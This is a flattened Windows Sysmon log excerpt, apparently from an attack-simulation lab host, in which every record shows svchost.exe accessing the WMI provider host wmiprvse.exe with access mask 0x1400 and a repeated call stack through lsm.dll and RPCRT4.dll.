12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292540Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292539Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292538Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292537Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292536Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292535Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292534Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292533Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292532Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.226{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292531Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.225{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292530Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.225{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292529Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.224{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292528Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.224{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292527Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.224{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292526Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.224{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292525Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.220{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292524Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.219{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292523Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292522Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292521Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292520Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292519Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292518Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292517Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 